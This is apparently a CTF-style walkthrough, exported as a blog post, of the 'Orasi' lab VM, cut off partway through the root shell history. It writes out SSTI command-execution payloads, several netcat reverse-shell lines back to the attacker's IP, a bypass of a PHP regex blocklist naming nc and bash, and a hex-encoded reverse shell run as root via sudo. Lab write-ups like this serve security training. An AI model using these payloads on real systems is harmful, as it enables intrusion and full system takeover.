{"id":869,"date":"2025-06-14T01:03:55","date_gmt":"2025-06-13T17:03:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=869"},"modified":"2025-06-14T01:03:55","modified_gmt":"2025-06-13T17:03:55","slug":"hmv-_-orasi","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/869\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Orasi"},"content":{"rendered":"<h1>Orasi<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103102.png\" alt=\"image-20250613212426153\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103104.png\" alt=\"image-20250613220241510\" 
\/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.101:21\nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:5000\n\nPORT     STATE SERVICE REASON         VERSION\n21\/tcp   open  ftp     syn-ack ttl 64 vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.10.102\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxr-xr-x    2 ftp      ftp          4096 Feb 11  2021 pub\n22\/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 8a:07:93:8e:8a:d6:67:fe:d0:10:88:14:61:49:5a:66 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV5JhXEPYY1iAKgsOubHh\/FgWFSavWgKUfoqiFxwB7S4qbMPCfmGLp8As9xAmjR1PUJfQE1UoyDOXOfXLIkiuba6zv6X3ga3tmdPi2trMmzVfPV3Hwk3j7OlvPSMEVYu4xgG+r80kwovwEW+OCxC04\/Ceyt5cx+X\/mFhaKjFx0+cBHs2C7vqhbUayG7M7nC4SZUz3cqrTIOJI3bSNBrPsPd\/zTRsm91LplPMiI2vleT02oeAhAzi7MgSRg3C9E+7e1fLsNrwEwuIKtB4JE6nQg1hfPi7X0nGFxfbXyC5RCv7BmHaW7kS0JRaANlCzAfpyKmdQOGcOq66ztViFl3kzl\n|   256 5a:cd:25:31:ec:f2:02:a8:a8:ec:32:c9:63:89:b2:e3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIku5W2Uq3eZVdLWg709TyUg27nayBfklC9qnck86PqWqVepLT27d7NHZbsjORKuLqudesobRJTYlPYrm3XgpZQ=\n|   256 39:70:57:cc:bb:9b:65:50:36:8d:71:00:a2:ac:24:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFJLqSs8cALmrM4F3VHcio3IDeIHdBT+M5BrDwZp8UJU\n80\/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: OPTIONS 
HEAD GET POST\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Site doesn&#039;t have a title (text\/html).\n5000\/tcp open  http    syn-ack ttl 64 Werkzeug httpd 1.0.1 (Python 3.7.3)\n|_http-server-header: Werkzeug\/1.0.1 Python\/3.7.3\n|_http-title: 404 Not Found\nMAC Address: 08:00:27:B5:33:7D (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2&gt;\/dev\/null\n\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        7l        9w       70c http:\/\/192.168.10.101\/\n200      GET        7l        9w       70c http:\/\/192.168.10.101\/index.html\n[####################] - 2m    882184\/882184  0s      found:2       errors:0      \n[####################] - 2m    882184\/882184  6285\/s  http:\/\/192.168.10.101\/ <\/code><\/pre>\n<h3>Service Probing<\/h3>\n<p>The <code>ftp<\/code> service is open and allows anonymous (<code>anonymous<\/code>) login:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ lftp $IP\nlftp 192.168.10.101:~&gt; ls                          \ndrwxr-xr-x    2 ftp      ftp          4096 Feb 11  2021 pub\nlftp 192.168.10.101:\/&gt; cd pub\nlftp 192.168.10.101:\/pub&gt; ls\n-rw-r--r--    1 ftp      ftp         16976 Feb 07  2021 url\nlftp 192.168.10.101:\/pub&gt; get url\n16976 bytes transferred           \nlftp 192.168.10.101:\/pub&gt; 
exit<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>url<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ file url\nurl: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=ef3648aae50173281b64e2d9f71511b1b4abb0a3, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ strings url\n\/lib64\/ld-linux-x86-64.so.2\nputs\nputchar\nprintf\nmalloc\n__cxa_finalize\n__libc_start_main\nlibc.so.6\nGLIBC_2.2.5\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nu\/UH\ngfffH\ngfffH\ngfffH\n[]A\\A]A^A_\nSometimes things are not obvious\nElement found: %d\nElement not found\n[%d] -&gt; [%c]\n;*3$&quot;\nGCC: (Debian 10.2.1-3) 10.2.1 
20201224\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.0\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nurl.c\n__FRAME_END__\n__init_array_end\n_DYNAMIC\n__init_array_start\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_csu_fini\nputchar@@GLIBC_2.2.5\n_ITM_deregisterTMCloneTable\nputs@@GLIBC_2.2.5\n_edata\ndisplay\nitem\nprintf@@GLIBC_2.2.5\nsearch\n__libc_start_main@@GLIBC_2.2.5\ntable\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n__libc_csu_init\nmalloc@@GLIBC_2.2.5\nhashCode\n__bss_start\nmain\ninsert\n__TMC_END__\n_ITM_registerTMCloneTable\n__cxa_finalize@@GLIBC_2.2.5\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n<p>Open it in <code>IDA<\/code> and decompile it with <code>F5<\/code>:<\/p>\n<pre><code class=\"language-c\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  init = (__int64)malloc(8u);\n  *(_BYTE *)init = 111;\n  *(_DWORD *)(init + 4) = -1;\n  insert(1, 47);\n  insert(2, 115);\n  insert(42, 104);\n  insert(4, 52);\n  insert(12, 100);\n  insert(14, 48);\n  insert(17, 119);\n  insert(18, 36);\n  insert(19, 115);\n  puts(&quot;Sometimes things are not obvious&quot;);\n  item = search(18);\n  if ( item )\n    printf(&quot;Element found: %d\\n&quot;, *(char *)item);\n  else\n    puts(&quot;Element not found&quot;);\n  return 0;\n}<\/code><\/pre>\n<p>It looks like something is hidden in there, so let's read the assembly instead:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103105.png\" alt=\"image-20250613223217072\" \/><\/p>\n<p>Read as ASCII, the second arguments of the <code>insert<\/code> calls (47, 115, 104, 52, 100, 48, 119, 36, 115) are the characters of a path; joined together they read <code>\/sh4d0w$s<\/code>, which looks like a directory, so let's check the web service:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n****** Orasi ******\n\n6 6 1337leet\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s http:\/\/$IP:5000 | html2text\n****** Not Found ******\nThe requested URL was not found on the server. 
If you entered the URL manually\nplease check your spelling and try again.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s &#039;http:\/\/192.168.10.101:5000\/sh4d0w$s&#039;\nNo input<\/code><\/pre>\n<p><code>$s<\/code> stands for a parameter named <code>s<\/code>, and <code>1337leet<\/code> reminds me of <strong>leetspeak<\/strong>, in which digits and symbols replace letters:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103106.png\" alt=\"image-20250613230704676\" \/><\/p>\n<h3>Fuzzing the input parameter<\/h3>\n<p>The <code>6 6<\/code> in front of it is probably a pair of <code>crunch<\/code> arguments, used to generate a wordlist of every possible six-character string over the alphabet <code>1337leet<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ crunch 6 6 1337leet &gt; a\nCrunch will now generate the following amount of data: 326592 bytes\n0 MB\n0 GB\n0 TB\n0 PB\nCrunch will now generate the following number of lines: 46656 \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ head -n 10 a 
\n111111\n111113\n111117\n11111l\n11111e\n11111t\n111131\n111133\n111137\n11113l<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ ffuf -u &quot;http:\/\/$IP:5000\/sh4d0w\\$s?FUZZ=id&quot; -w a -fw 2\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.10.101:5000\/sh4d0w$s?FUZZ=id\n :: Wordlist         : FUZZ: \/home\/kali\/temp\/Orasi\/a\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 2\n________________________________________________\n\nl333tt                  [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 124ms]\n:: Progress: [46656\/46656] :: Job [1\/1] :: 349 req\/sec :: Duration: [0:02:28] :: Errors: 0 ::<\/code><\/pre>\n<h3>SSTI reverse shell<\/h3>\n<p>That gives us a parameter name. Checking it shows nothing special at first; the value is simply reflected back:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s &#039;http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt=whoami&#039; \nwhoami\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s 
&#039;http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt=id&#039;    \nid<\/code><\/pre>\n<p>Let's look at what the site is running:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ whatweb http:\/\/192.168.10.101:5000\nhttp:\/\/192.168.10.101:5000 [404 Not Found] Country[RESERVED][ZZ], HTTPServer[Werkzeug\/1.0.1 Python\/3.7.3], IP[192.168.10.101], Python[3.7.3], Title[404 Not Found], Werkzeug[1.0.1]<\/code><\/pre>\n<p>It is a <code>python<\/code> backend on <code>Werkzeug<\/code>, the WSGI toolkit Flask is built on, and reflected input in a Flask app is a classic spot for Jinja2 template injection, so let's test for <code>SSTI<\/code>:<\/p>\n<blockquote>\n<p><a href=\"https:\/\/book.hacktricks.wiki\/en\/pentesting-web\/ssti-server-side-template-injection\/index.html?highlight=SSTI#ssti-server-side-template-injection\">https:\/\/book.hacktricks.wiki\/en\/pentesting-web\/ssti-server-side-template-injection\/index.html?highlight=SSTI#ssti-server-side-template-injection<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Server%20Side%20Template%20Injection\/Python.md\">https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Server%20Side%20Template%20Injection\/Python.md<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s &#039;http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt=\\{\\{7*7\\}\\}&#039;\n49<\/code><\/pre>\n<p>Success!!! The expression was evaluated server-side. Now try executing a command:<\/p>\n<pre><code class=\"language-bash\">{{ self.__init__.__globals__.__builtins__.__import__(&#039;os&#039;).popen(&#039;id&#039;).read() }}<\/code><\/pre>\n<p>Now for a reverse shell!!!!<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt={{ self.__init__.__globals__.__builtins__.__import__(&#039;os&#039;).popen(&#039;nc -e \/bin\/bash 192.168.10.102 1234&#039;).read() }}<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103107.png\" alt=\"image-20250613234648008\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@orasi:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@orasi:\/var\/www\/html$ sudo -l\nMatching Defaults entries for www-data on orasi:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on orasi:\n    (kori) NOPASSWD: \/bin\/php \/home\/kori\/jail.php *\n(remote) www-data@orasi:\/var\/www\/html$ cat \/home\/kori\/jail.php\n&lt;?php\narray_shift($_SERVER[&#039;argv&#039;]);\n$var = implode(&quot; &quot;, $_SERVER[&#039;argv&#039;]);\n\nif($var == null) die(&quot;Orasis Jail, argument missing\\n&quot;);\n\nfunction filter($var) {\n        if(preg_match(&#039;\/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\\\/)\/i&#039;, $var)) {\n                return false;\n        }\n        return true;\n}\nif(filter($var)) {\n        $result = exec($var);\n        echo &quot;$result\\n&quot;;\n        echo &quot;Command executed&quot;;\n} else {\n        echo &quot;Restricted characters has been used&quot;;\n}\necho 
&quot;\\n&quot;;\n?&gt;<\/code><\/pre>\n<h3>Bypassing the restricted command execution<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@orasi:\/var\/www\/html$ sudo -u kori \/bin\/php \/home\/kori\/jail.php id\nuid=1001(kori) gid=1001(kori) groups=1001(kori)\nCommand executed<\/code><\/pre>\n<p>There are plenty of ways to bypass this filter. For example, work through the <a href=\"https:\/\/www.revshells.com\/\">revshell<\/a> generators one by one: any interpreter present on the box, such as <code>python<\/code> or <code>perl<\/code>, can spawn the shell, or execute a script the way I did...<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@orasi:\/tmp$ sudo -u kori \/bin\/php \/home\/kori\/jail.php &quot;cat test | sh&quot;\nkori\nCommand executed<\/code><\/pre>\n<p>That opens up a lot of options.... You could say the blocklist above blocked nothing at all, since only the argument is checked and the piped file carries the real command; even busybox is an option. There are plenty of approaches, so pick whichever you like...<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@orasi:\/tmp$ echo &#039;nc -e \/bin\/bash 192.168.10.102 2345&#039; &gt; exp\n(remote) www-data@orasi:\/tmp$ sudo -u kori \/bin\/php \/home\/kori\/jail.php &quot;cat exp | sh&quot;\nstty: &#039;standard input&#039;: Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103109.png\" alt=\"image-20250613235640273\" \/><\/p>\n<h3>Extracting the password from the apk<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ pwncat-cs -lp 2345 2&gt;\/dev\/null \n[11:55:53] Welcome to pwncat \ud83d\udc08!                                          __main__.py:164\n[11:56:05] received connection from 192.168.10.101:44886                     bind.py:84\n[11:56:05] 192.168.10.101:44886: registered new host w\/ db               manager.py:957\n(local) pwncat$ \n(remote) kori@orasi:\/tmp$ whoami;id\nkori\nuid=1001(kori) gid=1001(kori) groups=1001(kori)\n(remote) kori@orasi:\/tmp$ echo $SHELL\n\/bin\/sh\n(remote) kori@orasi:\/tmp$ sudo -l\nMatching Defaults entries for kori on orasi:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser kori may run the following commands on orasi:\n    (irida) NOPASSWD: \/usr\/bin\/cp \/home\/irida\/irida.apk 
\/home\/kori\/irida.apk<\/code><\/pre>\n<p>Good grief, am I still on <code>linux<\/code>? Why is there suddenly an <code>apk<\/code>? With no other option, just run it and see..<\/p>\n<pre><code class=\"language-bash\">(remote) kori@orasi:\/tmp$ sudo -u irida \/usr\/bin\/cp \/home\/irida\/irida.apk \/home\/kori\/irida.apk\n\/usr\/bin\/cp: cannot create regular file &#039;\/home\/kori\/irida.apk&#039;: Permission denied\n(remote) kori@orasi:\/tmp$ file \/home\/kori\/irida.apk\n\/home\/kori\/irida.apk: cannot open `\/home\/kori\/irida.apk&#039; (No such file or directory)\n(remote) kori@orasi:\/tmp$ cd ~\/\n(remote) kori@orasi:\/home\/kori$ ls -la\ntotal 20\ndrwxr-xr-x 3 kori kori 4096 Feb 11  2021 .\ndrwxr-xr-x 4 root root 4096 Feb 11  2021 ..\n-rw------- 1 kori kori    6 Feb 11  2021 .bash_history\ndrwx------ 3 kori kori 4096 Feb 11  2021 .gnupg\n-rwxr-xr-x 1 kori kori  509 Feb 11  2021 jail.php\n(remote) kori@orasi:\/home\/kori$ chmod 777 ..\/kori\n(remote) kori@orasi:\/home\/kori$ sudo -u irida \/usr\/bin\/cp \/home\/irida\/irida.apk \/home\/kori\/irida.apk\n(remote) kori@orasi:\/home\/kori$ file irida.apk \nirida.apk: regular file, no read permission<\/code><\/pre>\n<p>The copy is owned by irida and unreadable, because a freshly created file inherits the source's 700 mode. So this thing dares to be stubborn; just delete it, create a world-writable file with the same name, and copy again: writing into an existing destination keeps that file's owner and permissions!<\/p>\n<pre><code class=\"language-bash\">(remote) kori@orasi:\/home\/kori$ rm irida.apk \nrm: remove write-protected regular file &#039;irida.apk&#039;? 
y\n(remote) kori@orasi:\/home\/kori$ touch irida.apk\n(remote) kori@orasi:\/home\/kori$ chmod 777 irida.apk \n(remote) kori@orasi:\/home\/kori$ sudo -u irida \/usr\/bin\/cp \/home\/irida\/irida.apk \/home\/kori\/irida.apk\n(remote) kori@orasi:\/home\/kori$ ls -la\ntotal 4012\ndrwxrwxrwx 3 kori kori    4096 Jun 13 12:08 .\ndrwxr-xr-x 4 root root    4096 Feb 11  2021 ..\n-rw------- 1 kori kori       6 Feb 11  2021 .bash_history\ndrwx------ 3 kori kori    4096 Feb 11  2021 .gnupg\n-rwxrwxrwx 1 kori kori 4083889 Jun 13 12:08 irida.apk\n-rwxr-xr-x 1 kori kori     509 Feb 11  2021 jail.php\n(remote) kori@orasi:\/home\/kori$ file irida.apk \nirida.apk: Zip archive data, at least v?[0] to extract<\/code><\/pre>\n<p>Transfer it to the local machine and poke at it freely:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ file irida.apk\nirida.apk: Android package (APK), with zipflinger virtual entry, with APK Signing Block<\/code><\/pre>\n<p>Luckily I have done some beginner reverse-engineering challenges before: rename it to <code>.zip<\/code>, extract it, and decompile it with a tool to read the source code. I use <code>jadx<\/code>: <a href=\"https:\/\/github.com\/skylot\/jadx\">https:\/\/github.com\/skylot\/jadx<\/a>; download it if needed, and just drop the extracted <code>.dex<\/code> into it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103110.png\" alt=\"image-20250614004412932\" \/><\/p>\n<p>Along the way I stumbled on a tool I downloaded some time ago:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103111.png\" alt=\"image-20250614002908545\" \/><\/p>\n<p>I do not even remember where I got it; if you told me it was malware I would believe you..... You just drop the apk in and it decompiles it automatically. (Not an ad, honest)<\/p>\n<p>Then I found the password. It shows <code>1#2#3#4#5<\/code>, and combined with the code below we learn:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103112.png\" alt=\"image-20250614004523872\" \/><\/p>\n<p>This code concatenates five fields to produce the password <code>eye.of.the.tiger()<\/code>. Do not forget that a dot is inserted between the fields when the password is assembled below; that is probably what the author's hint at the start was warning about:<\/p>\n<blockquote>\n<p>CTF like VM. Hint: Just one useless little dot.<\/p>\n<\/blockquote>\n<p>Try logging in as irida with it, and it succeeds!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103113.png\" alt=\"image-20250614005008413\" \/><\/p>\n<h3>Embedding a reverse shell in python<\/h3>\n<p>First, gather some information:<\/p>\n<pre><code 
class=\"language-bash\">irida@orasi:~$ ls -la\ntotal 4024\ndrwxr-xr-x 3 irida irida    4096 Feb 11  2021 .\ndrwxr-xr-x 4 root  root     4096 Feb 11  2021 ..\n-rw------- 1 irida irida     465 Feb 11  2021 .bash_history\n-rw-r--r-- 1 irida irida     220 Feb 11  2021 .bash_logout\n-rw-r--r-- 1 irida irida    3526 Feb 11  2021 .bashrc\ndrwx------ 3 irida irida    4096 Feb 11  2021 .gnupg\n-rwx------ 1 irida irida 4083889 Feb 11  2021 irida.apk\n-rw-r--r-- 1 irida irida     807 Feb 11  2021 .profile\n-rw------- 1 irida irida      33 Feb 11  2021 user.txt\nirida@orasi:~$ cat user.txt \n2afb9cbb10c22dc7e154a8c434595948\nirida@orasi:~$ cat .bash_history \nexit\nwget 10.0.2.15:8080\nwget 10.0.2.15:8000\/irida.apk\nls\nls -la\nchmod 600 irida.apk\nls -la\necho &quot;2afb9cbb10c22dc7e154a8c434595948&quot; &gt; user.txt\nls -la\nchmod 600 user.txt\ncat user.txt\nls -la\nwhich python3\nlocate cp\nwhich cp\nls\nls -la\nchmod 700 irida.apk\nls\nls -la\npython3 -m http.server 8000\nclear\nls\nsudo -l\nexit\nclear\nsudo -l\nsudo -u root \/usr\/bin\/python3 \/root\/oras.py\nls\ncat \/root\/root.txt\ncat \/root\/oras.py\nsudo -u root \/usr\/bin\/python3 \/root\/oras.py\nclear\nexit\nirida@orasi:~$ sudo -l\nMatching Defaults entries for irida on orasi:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser irida may run the following commands on orasi:\n    (root) NOPASSWD: \/usr\/bin\/python3 \/root\/oras.py<\/code><\/pre>\n<p>Try running it to see what it does:<\/p>\n<pre><code class=\"language-bash\">irida@orasi:~$ sudo -u root \/usr\/bin\/python3 \/root\/oras.py\n: whoami\nTraceback (most recent call last):\n  File &quot;\/root\/oras.py&quot;, line 7, in &lt;module&gt;\n    name = bytes.fromhex(name).decode(&#039;utf-8&#039;)\nValueError: non-hexadecimal number found in fromhex() arg at position 
0<\/code><\/pre>\n<p>The traceback shows that the script hex-decodes its input (<code>bytes.fromhex<\/code>), so hex-encode the command first and try again:<\/p>\n<pre><code class=\"language-bash\">whoami\n77686f616d69<\/code><\/pre>\n<p>Then it errors:<\/p>\n<pre><code class=\"language-bash\">irida@orasi:~$ sudo -u root \/usr\/bin\/python3 \/root\/oras.py\n: 77686f616d69\nTraceback (most recent call last):\n  File &quot;\/root\/oras.py&quot;, line 8, in &lt;module&gt;\n    print(exec(name))\n  File &quot;&lt;string&gt;&quot;, line 1, in &lt;module&gt;\nNameError: name &#039;whoami&#039; is not defined<\/code><\/pre>\n<p>Good: the decoded string reached <code>exec()<\/code> and was parsed as Python, so the script runs whatever Python we feed it, as root. Let's hex-encode a python reverse shell and run it!!!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103114.png\" alt=\"image-20250614010028494\" \/><\/p>\n<pre><code class=\"language-bash\">irida@orasi:~$ sudo -u root \/usr\/bin\/python3 \/root\/oras.py\n: 696d706f7274206f733b6f732e73797374656d28226e63202d65202f62696e2f62617368203139322e3136382e31302e31303220333435362229\nstty: &#039;standard input&#039;: Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found\n<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140103115.png\" alt=\"image-20250614010014918\" \/><\/p>\n<p>Root shell obtained!!!! As a bonus, root's history shows the whole process the author went through to build the box; that may come in handy for me some day!!<\/p>\n<pre><code class=\"language-bash\">(remote) root@orasi:\/root# ls -la\ntotal 52\ndrwx------  6 root root 4096 Feb 11  2021 .\ndrwxr-xr-x 18 root root 4096 Feb 11  2021 ..\n-rw-------  1 root root 4305 Feb 11  2021 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Feb 11  2021 .cache\ndrwxr-xr-x  2 root root 4096 Feb 11  2021 .cron\ndrwx------  3 root root 4096 Feb 11  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 Feb 11  2021 .local\n-rwx------  1 root root  126 Feb 11  2021 oras.py\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   33 Feb 11  2021 root.txt\n-rw-r--r--  1 root root  180 Feb 11  2021 .wget-hsts\n(remote) root@orasi:\/root# cat .bash_history\nclear\nwhich python3\nsudo apt-get install python3-pip\napt-get install sudo\nsudo apt-get install python3-pip\npip3 install flask\nsudo apt-get install vsftpd\nsudo apt-get install php\nclear\nsudo useradd kori\npasswd kori\ncd \/home\nls\nsudo useradd -m -d \/home\/kori kori\nsudo -m -d \/home\/kori 
kori\nsudo mkdir \/home\/kori\ncd\nclear\nls\nsudo chown kori:kori \/home\/kori\nls -l \/home\/kori\/\nls -l \/home\/\ncat \/etc\/passwd\ncd\nclear\nsudo apt-get install vsftpd\nsudo cp \/etc\/vsftpd.conf \/etc\/vsftpd.conf.orig\nsudo mkdir -p \/var\/ftp\/pub\nsudo chown nobody:nogroup \/var\/ftp\/pub\nnano \/etc\/vsftpd.conf\nsudo systemctl restart vsftpd\nsudo systemctl status vsftpf\nsudo systemctl status vsftpd\nclear\ncd \/var\/\nls\ncd ftp\nls\ncd pub\nls\nwget 10.0.2.15:8000\/url\nls\nls -la\nchown www-data:www-data url\nls -la\nchown nobody:nogroup url\nclear\ncd\nclear\nls\ncd var\nls\ncd \/var\nls\ncd www\nls\ncd html\nls\nrm index.hmtl\nrm index.html\nclear\ns\nwget 10.0.2.15:8001\/server.py\nwget 10.0.2.15:8002\/server.py\nclear\nls\nls -la\ncd \ncd \/etc\/systemd\/system\/\nnano orasi.service\ncat orasi.service\nsystemctl enable orasi.service\nreboot\nexport TERM=xterm\nd\ncd\nls\nclear\nsudo apt-get purge ssh\nsudo apt-get remove ssh\nsudo apt-get purge openssh-server\nsudo apt-get remove openssh-server\nsudo apt-get autoremove openssh-server\nclear\nls\ncd \/var\/www\/html\nls\npython3 server.py\nreboot\nclear\nls\nls -la\nmkdir .\/cron\nls -la\nrm cron\nrm -rf dir\nclear\nmkdir .cron\ncd .cron\nwget raw.githubusercontent.com\/AL1ENUM\/cron-service\/main\/check.sh\nks\ncat check.sh \nsystem is-active orasi.service\nsystemctl is-active orasi.service\nnano check.sh\nsystem is-active orasi.service\nsystemctl is-active orasi.service\nclear\ncd\nnano 